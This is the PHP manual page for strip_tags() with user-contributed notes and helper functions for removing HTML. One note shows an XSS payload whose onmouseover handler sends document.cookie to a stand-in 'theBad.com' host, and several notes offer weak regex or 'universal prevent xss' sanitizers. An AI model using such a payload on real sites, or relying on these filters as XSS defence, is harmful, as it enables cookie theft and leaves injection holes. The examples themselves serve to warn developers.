
strip_tags

(PHP 4, PHP 5)

strip_tags - Strip HTML and PHP tags from a string

Description

string strip_tags ( string $str [, string $allowable_tags ] )

This function tries to return a string with all NULL bytes, HTML and PHP tags stripped from a given str. It uses the same tag stripping state machine as the fgetss() function.

Parameters

str

The input string.

allowable_tags

You can use the optional second parameter to specify tags which should not be stripped.

Note:

HTML comments and PHP tags are also stripped. This is hardcoded and cannot be changed with allowable_tags.

Note:

This parameter should not contain whitespace. strip_tags() sees a tag as a case-insensitive string between < and the first whitespace or >. It means that strip_tags("<br/>", "<br>") returns an empty string.
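
One way to keep whitespace and slashes out of allowable_tags is to build the string from bare tag names. The following is a minimal sketch; the helper name build_allowable_tags() is hypothetical and not part of PHP.

```php
<?php
// Hypothetical helper (not part of PHP): builds an allowable_tags string
// such as "<p><a>" from bare tag names, so that no whitespace or slash
// can slip into the parameter.
function build_allowable_tags(array $names)
{
    $tags = '';
    foreach ($names as $name) {
        // Accept only plain tag names like "p", "a" or "h1".
        if (!preg_match('/^[a-z][a-z0-9]*\z/i', $name)) {
            throw new InvalidArgumentException("Not a bare tag name: $name");
        }
        $tags .= '<' . strtolower($name) . '>';
    }
    return $tags;
}

$allowed = build_allowable_tags(array('p', 'a'));  // "<p><a>"
echo strip_tags('<p>Hi there</p><b>!</b>', $allowed), "\n";
```

Rejecting anything that is not a bare name means a value such as "br /" fails loudly instead of silently changing which tags survive.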

Return Values

Returns the stripped string.

Changelog

Version Description
5.0.0 strip_tags() is now binary safe.
4.3.0 HTML comments are now always stripped.

Examples

Example #1 strip_tags() example

<?php
$text = '<p>Test paragraph.</p><!-- Comment --> <a href="#fragment">Other text</a>';
echo strip_tags($text);
echo "\n";

// Allow <p> and <a>
echo strip_tags($text, '<p><a>');
?>

The above example will output:

Test paragraph. Other text
<p>Test paragraph.</p> <a href="#fragment">Other text</a>

Notes

Warning

Because strip_tags() does not actually validate the HTML, partial or broken tags can result in the removal of more text/data than expected.
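
A common trigger for this is a literal < in ordinary text, as in "Price <100 dollars": a < followed directly by a non-whitespace character is treated as the start of a tag, so the text after it can be lost. The sketch below escapes such characters before stripping. The helper name escape_stray_lt() is hypothetical, and the rule it applies (a tag starts with a letter, "/", "!" or "?") is a simplifying assumption.

```php
<?php
// Hypothetical helper: turns every "<" that is not followed by a letter,
// "/", "!" or "?" into "&lt;", so strip_tags() no longer sees it as the
// start of a tag.
function escape_stray_lt($str)
{
    return preg_replace('/<(?![a-z\/!?])/i', '&lt;', $str);
}

$input = 'Price <100 dollars, <b>today</b> only';
echo strip_tags(escape_stray_lt($input)), "\n";
```

Real tags such as <b> and </b> are still recognized and removed; only the stray < is preserved, as an entity.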

Warning

This function does not modify any attributes on the tags that you allow using allowable_tags, including the style and onmouseover attributes that a mischievous user may abuse when posting text that will be shown to other users.
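
If the allowed tags do not need any attributes, one rough approach is to drop all attributes after stripping. This is only a sketch under that assumption: the helper name drop_attributes() is hypothetical, it also removes harmless attributes such as href, and a regex is no substitute for a real HTML sanitizer.

```php
<?php
// Hypothetical helper: rewrites every opening tag as "<name>", dropping
// all attributes. Regex-based, so it is only a rough sketch: a ">" inside
// an attribute value would confuse it.
function drop_attributes($html)
{
    return preg_replace('/<([a-z][a-z0-9]*)\b[^>]*>/i', '<$1>', $html);
}

$input = '<p onmouseover="alert(1)" style="color:red">Hello</p>';
echo drop_attributes(strip_tags($input, '<p>')), "\n";
```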

Note:

Tag names within the input HTML that are greater than 1023 bytes in length will be treated as though they are invalid, regardless of the allowable_tags parameter.

User Contributed Notes 17 notes

up
27
Kenji
3 months ago
A word of warning!!
Do NOT use the regex posted by "admin at automapit dot com". It's broken:

"lalala <b<b>> lala </b<b>>"

will be stripped into

"lalala <b> lala </b>"

I CANNOT overstate the severity of the security issues you introduce with code like this! Don't use it, stay safe.
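
The failure above comes from running the replacement only once: removing the inner "<b>" leaves a new "<b>" behind. A minimal sketch of one mitigation is to repeat the replacement until the string stops changing. The helper name strip_until_stable() is hypothetical, and this is still not a sanitizer, since unmatched "<" or ">" characters are left in place.

```php
<?php
// Hypothetical helper: repeats a single-pass tag-removal regex until the
// string stops changing, so tags reassembled from nested fragments are
// removed as well.
function strip_until_stable($html)
{
    do {
        $before = $html;
        $html = preg_replace('/<[^<>]*>/', '', $html);
    } while ($html !== $before);
    return $html;
}

var_dump(strip_until_stable('lalala <b<b>> lala </b<b>>'));
```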
up
29
CEO at CarPool2Camp dot org
5 years ago
Note the different outputs from different versions of the same tag:

<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';

$new = strip_tags($data, '<br>');
var_dump($new);  // OUTPUTS string(21) "<br>EachNew<br />Line"

$new = strip_tags($data, '<br/>');
var_dump($new);  // OUTPUTS string(16) "Each<br/>NewLine"

$new = strip_tags($data, '<br />');
var_dump($new);  // OUTPUTS string(11) "EachNewLine"
?>
up
3
obeyer at popsugar dot com
6 months ago
Actually, for PHP 5.4.19, if you want to allow line breaks, you should pass "<br>" as the allowable tag. Passing <br/> or <br /> in allowable tags does nothing, and the line breaks will be stripped.
up
14
mariusz.tarnaski at wp dot pl
5 years ago
Hi. I made a function that removes the HTML tags along with their contents:

Function:
<?php
function strip_tags_content($text, $tags = '', $invert = FALSE) {

  preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($tags), $tags);
  $tags = array_unique($tags[1]);

  if (is_array($tags) AND count($tags) > 0) {
    if ($invert == FALSE) {
      return preg_replace('@<(?!(?:'. implode('|', $tags) .')\b)(\w+)\b.*?>.*?</\1>@si', '', $text);
    }
    else {
      return preg_replace('@<('. implode('|', $tags) .')\b.*?>.*?</\1>@si', '', $text);
    }
  }
  elseif ($invert == FALSE) {
    return preg_replace('@<(\w+)\b.*?>.*?</\1>@si', '', $text);
  }
  return $text;
}
?>

Sample text:
$text = '<b>sample</b> text with <div>tags</div>';

Result for strip_tags($text):
sample text with tags

Result for strip_tags_content($text):
text with

Result for strip_tags_content($text, '<b>'):
<b>sample</b> text with

Result for strip_tags_content($text, '<b>', TRUE);
text with <div>tags</div>

I hope someone finds this useful :)
up
2
mshaffer
10 months ago
Below was a note on "strip_tags" page that got removed off of PHP.net ... I found this note useful, and use the code in parsing before "stripping tags" ... I don't know why in the world you would delete this one, but keep others ... your review system is a bit disturbing ...

On your page you have a warning about how data may be lost, but you delete a user-contributed comment that helps prevent that?

======================

aleksey at favor dot com dot ua 24-Feb-2011 01:06

strip_tags() destroys all the HTML after a tag with invalid attributes, such as <img src="/images/image.jpg""> (note the stray quote before the >).

So I wrote a function that fixes unsafe attributes and replaces stray " and ' quotes with &quot; and &#39;.

<?php
function fix_unsafe_attributes($s) {
  $out = '';
  while (preg_match('/<([A-Za-z])[^>]*?>/', $s, $i, PREG_OFFSET_CAPTURE)) { // find where the tag begins
    $i = $i[1][1]+1;
    $out.= substr($s, 0, $i);
    $s = substr($s, $i);

    // scan attributes and find odd " and '
    while (((($i1 = strpos($s, '"')) || 1) && (($i2 = strpos($s, '\'')) || 1)) && ($i1 !== false || $i2 !== false) &&
           (($i = (int)(($i1 !== false) && ($i2 !== false) ? ($i1 < $i2 ? $i1 : $i2) : ($i1 == false ? $i2 : $i1))) !== false) &&
           ((($c = strpos($s, '>')) === false) || ($i < $c))) {

      // square brackets replace the old $s{$i} string-offset syntax
      $c = $s[$i];
      if (($i < 1) || ($s[$i-1] != '=')) {
        $out.= substr($s, 0, $i).($s[$i] == '"' ? '&quot;' : '&#39;'); // replace odd " and '
        $s = substr($s, $i+1);
      } else {
        $i++;
        $out.= substr($s, 0, $i);
        $s = substr($s, $i);

        if (($i = strpos($s, $c)) !== false) {
          $i++;
          $out.= substr($s, 0, $i);
          $s = substr($s, $i);
        }
      }
    }
  }
  return $out.$s;
}
?>

Maybe this function could be rewritten as a simple regular expression, but I had no luck doing that quickly.
up
7
bzplan at web dot de
1 year ago
Given HTML code like this:

<?php
$html = '
<div>
<p style="color:blue;">color is blue</p><p>size is <span style="font-size:200%;">huge</span></p>
<p>material is wood</p>
</div>
';
?>

with <?php $str = strip_tags($html); ?>
... the result is:

$str = 'color is bluesize is huge
material is wood';

notice: the words 'blue' and 'size' run together :(
and the line breaks are still in the new string $str

if you need a space between the words (and without line-break)
use my function: <?php $str = rip_tags($html); ?>
... the result is:

$str = 'color is blue size is huge material is wood';

the function:

<?php
// --------------------------------------------------------------

function rip_tags($string) {

    // ----- remove HTML TAGs -----
    $string = preg_replace ('/<[^>]*>/', ' ', $string);

    // ----- remove control characters -----
    $string = str_replace("\r", '', $string);    // --- remove
    $string = str_replace("\n", ' ', $string);   // --- replace with space
    $string = str_replace("\t", ' ', $string);   // --- replace with space

    // ----- remove multiple spaces -----
    $string = trim(preg_replace('/ {2,}/', ' ', $string));

    return $string;

}

// --------------------------------------------------------------
?>

the KEY is the regex pattern: '/<[^>]*>/'
instead of strip_tags()
... then remove control characters and multiple spaces
:)
up
12
admin at automapit dot com
7 years ago
<?php
function html2txt($document) {
    $search = array(
        '@<script[^>]*?>.*?</script>@si',  // Strip out javascript
        '@<[\/\!]*?[^<>]*?>@si',           // Strip out HTML tags
        '@<style[^>]*?>.*?</style>@siU',   // Strip style tags properly
        '@<![\s\S]*?--[ \t\n\r]*>@'        // Strip multi-line comments including CDATA
    );
    $text = preg_replace($search, '', $document);
    return $text;
}
?>

This function turns HTML into text... strips tags, comments spanning multiple lines including CDATA, and anything else that gets in its way.

It's a Frankenstein function I made from bits picked up on my travels through the web, thanks to the many who have unwittingly contributed!
up
2
tom at cowin dot us
3 years ago
With most web based user input of more than a line of text, it seems I get 90% 'paste from Word'. I've developed this fn over time to try to strip all of this cruft out. A few things I do here are application specific, but if it helps you - great, if you can improve on it or have a better way - please - post it...

<?php
function strip_word_html($text, $allowed_tags = '<b><i><sup><sub><em><strong><u><br>')
{
    mb_regex_encoding('UTF-8');

    // replace MS special characters first
    $search = array('/&lsquo;/u', '/&rsquo;/u', '/&ldquo;/u', '/&rdquo;/u', '/&mdash;/u');
    $replace = array('\'', '\'', '"', '"', '-');
    $text = preg_replace($search, $replace, $text);

    // make sure _all_ html entities are converted to the plain ascii equivalents - it appears
    // in some MS headers, some html entities are encoded and some aren't
    $text = html_entity_decode($text, ENT_QUOTES, 'UTF-8');

    // try to strip out any C style comments first, since these, embedded in html comments, seem to
    // prevent strip_tags from removing html comments (MS Word introduced combination)
    if (mb_stripos($text, '/*') !== FALSE) {
        $text = mb_eregi_replace('#/\*.*?\*/#s', '', $text, 'm');
    }

    // introduce a space into any arithmetic expressions that could be caught by strip_tags so that they won't be
    // '<1' becomes '< 1' (note: somewhat application specific)
    $text = preg_replace(array('/<([0-9]+)/'), array('< $1'), $text);
    $text = strip_tags($text, $allowed_tags);

    // eliminate extraneous whitespace from start and end of line, or anywhere there are two or more spaces, convert it to one
    $text = preg_replace(array('/^\s\s+/', '/\s\s+$/', '/\s\s+/u'), array('', '', ' '), $text);

    // strip out inline css and simplify style tags
    $search = array('#<(strong|b)[^>]*>(.*?)</(strong|b)>#isu', '#<(em|i)[^>]*>(.*?)</(em|i)>#isu', '#<u[^>]*>(.*?)</u>#isu');
    $replace = array('<b>$2</b>', '<i>$2</i>', '<u>$1</u>');
    $text = preg_replace($search, $replace, $text);

    // on some of the ?newer MS Word exports, where you get conditionals of the form 'if gte mso 9', etc., it appears
    // that whatever is in one of the html comments prevents strip_tags from eradicating the html comment that contains
    // some MS Style Definitions - this last bit gets rid of any leftover comments
    $num_matches = preg_match_all("/\<!--/u", $text, $matches);
    if ($num_matches) {
        $text = preg_replace('/\<!--(.)*--\>/isu', '', $text);
    }
    return $text;
}
?>
up
1
bnt dot gloria at outlook dot com
14 days ago
With allowable_tags, strip_tags() is not safe.

<?php
$str = "<p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";
$str = strip_tags($str, '<p>');
echo $str; // DISPLAY: <p onmouseover="window.location='http://www.theBad.com/?cookie='+document.cookie;"> don't mouseover </p>
?>
up
0
pietro777
1 month ago
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br />||<br/>||<br>');
var_dump($new); // OUTPUTS string(26) "<br>Each<br/>New<br />Line"
up
-1
kai at froghh dot de
5 years ago
A function that decides whether < is the start of a tag or a less-than / less-than-or-equal sign:

<?php
function lt_replace($str){
    // "/", "!" and "?" are excluded so that closing tags, comments and PHP tags are left alone
    return preg_replace("/<([^[:alpha:]\/!?])/", '&lt;\\1', $str);
}
?>

It's meant to be used before strip_tags().
up
-1
cesar at nixar dot org
8 years ago
Here is a recursive function for strip_tags() like the one shown on the stripslashes manual page.

<?php
function strip_tags_deep($value)
{
  return is_array($value) ?
    array_map('strip_tags_deep', $value) :
    strip_tags($value);
}

// Example
$array = array('<b>Foo</b>', '<i>Bar</i>', array('<b>Foo</b>', '<i>Bar</i>'));
$array = strip_tags_deep($array);

// Output
print_r($array);
?>
up
-2
salavert at~ akelos
8 years ago
<?php
/**
 * Works like PHP function strip_tags, but it only removes selected tags.
 * Example:
 *     strip_selected_tags('<b>Person:</b> <strong>Salavert</strong>', 'strong') => <b>Person:</b> Salavert
 */
function strip_selected_tags($text, $tags = array())
{
    $args = func_get_args();
    $text = array_shift($args);
    $tags = func_num_args() > 2 ? array_diff($args, array($text)) : (array)$tags;
    foreach ($tags as $tag) {
        if (preg_match_all('/<'.$tag.'[^>]*>(.*)<\/'.$tag.'>/iU', $text, $found)) {
            $text = str_replace($found[0], $found[1], $text);
        }
    }

    return $text;
}
?>

Hope you find it useful,

Jose Salavert
up
-1
sERGE-01
7 months ago
My strip_tags:

1) Simple removal of all disallowed tags. Broken tags remain unchanged:
<?php
    $tags_allowed = "a|b|i|s|u|br";
    $in_text = "<b>Bold</b><table><tr><td>Table</td></tr></table><br><i>Italic>></i><div>Div</div>";

    // the \b inside the lookahead keeps tags such as <span> from being mistaken for the allowed <s>
    $out_text = preg_replace('#</?(?!(?:'.$tags_allowed.')\b)\b([^><]*>)#sim', "", $in_text);

    print "Example 1:<br>";
    print htmlentities($out_text)."<br>";
?>
-------------------------------
Example 1:
<b>Bold</b>Table<br><i>Italic>></i>Div
-------------------------------

2) This example keeps all allowed tags and escapes the rest of the text with the htmlentities() function:
<?php
    // getting all of allowed tags with their offset
    if (preg_match_all('#</?('.$tags_allowed.')\b([^><]*>)#sim', $in_text, $matches, PREG_OFFSET_CAPTURE))
    {
        $out_text = "";
        $ofs = 0;
        foreach ($matches[0] as $tag)
        {
            // text before allowed tag
            $out_text .= htmlentities(substr($in_text, $ofs, $tag[1] - $ofs), ENT_NOQUOTES, "cp1251");
            $out_text .= $tag[0]; // next allowed tag
            $ofs = $tag[1] + strlen($tag[0]);
        }
        // adding end of text
        $out_text .= htmlentities(substr($in_text, $ofs), ENT_NOQUOTES, "cp1251");
    }

    print "Example 2:<br>";
    print htmlentities($out_text)."<br>";
?>
-------------------------------
Example 2:
<b>Bold</b>&lt;table&gt;&lt;tr&gt;&lt;td&gt;Table&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br>
<i>Italic&gt;&gt;</i>&lt;div&gt;Div&lt;/div&gt;
-------------------------------
up
-2
sERGE-01
7 months ago
Fix for my Example2.
If the text does not have allowed tags, $out_text is empty. Fix:

<?php
    $out_text = "";
    $ofs = 0;
    if (preg_match_all('#</?('.$tags_allowed.')\b([^><]*>)#sim', $in_text, $matches, PREG_OFFSET_CAPTURE))
    {
        foreach ($matches[0] as $tag)
        {
            $out_text .= htmlentities(substr($in_text, $ofs, $tag[1] - $ofs), ENT_NOQUOTES, "cp1251");
            $out_text .= $tag[0];
            $ofs = $tag[1] + strlen($tag[0]);
        }
    }
    $out_text .= htmlentities(substr($in_text, $ofs), ENT_NOQUOTES, "cp1251"); // end of text
?>
up
-5
andy
4 months ago
<?php
//***    Universal prevent xss  ***
//   place this in top of script to prevent xss on your site
$_GET=array_map("strip_tags",$_GET);
$_POST=array_map("strip_tags",$_POST);
?>
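
Note that array_map() with strip_tags() only handles flat arrays of strings; a request such as ?a[]=1 produces a nested array that strip_tags() cannot process. A widely used alternative is to leave the input alone and escape values at output time with htmlspecialchars(). The following is a minimal sketch; the helper name e() is hypothetical.

```php
<?php
// Hypothetical helper: escapes a value for output inside HTML text or a
// quoted attribute value.
function e($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

$comment = '<script>alert("x")</script>';
echo '<p>', e($comment), '</p>', "\n";
```

Escaping on output keeps the stored data intact and does not depend on guessing what counts as a tag.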
up
-18
brettz9 AAT yah
5 years ago
Works on shortened <?...?> syntax and thus also will remove XML processing instructions.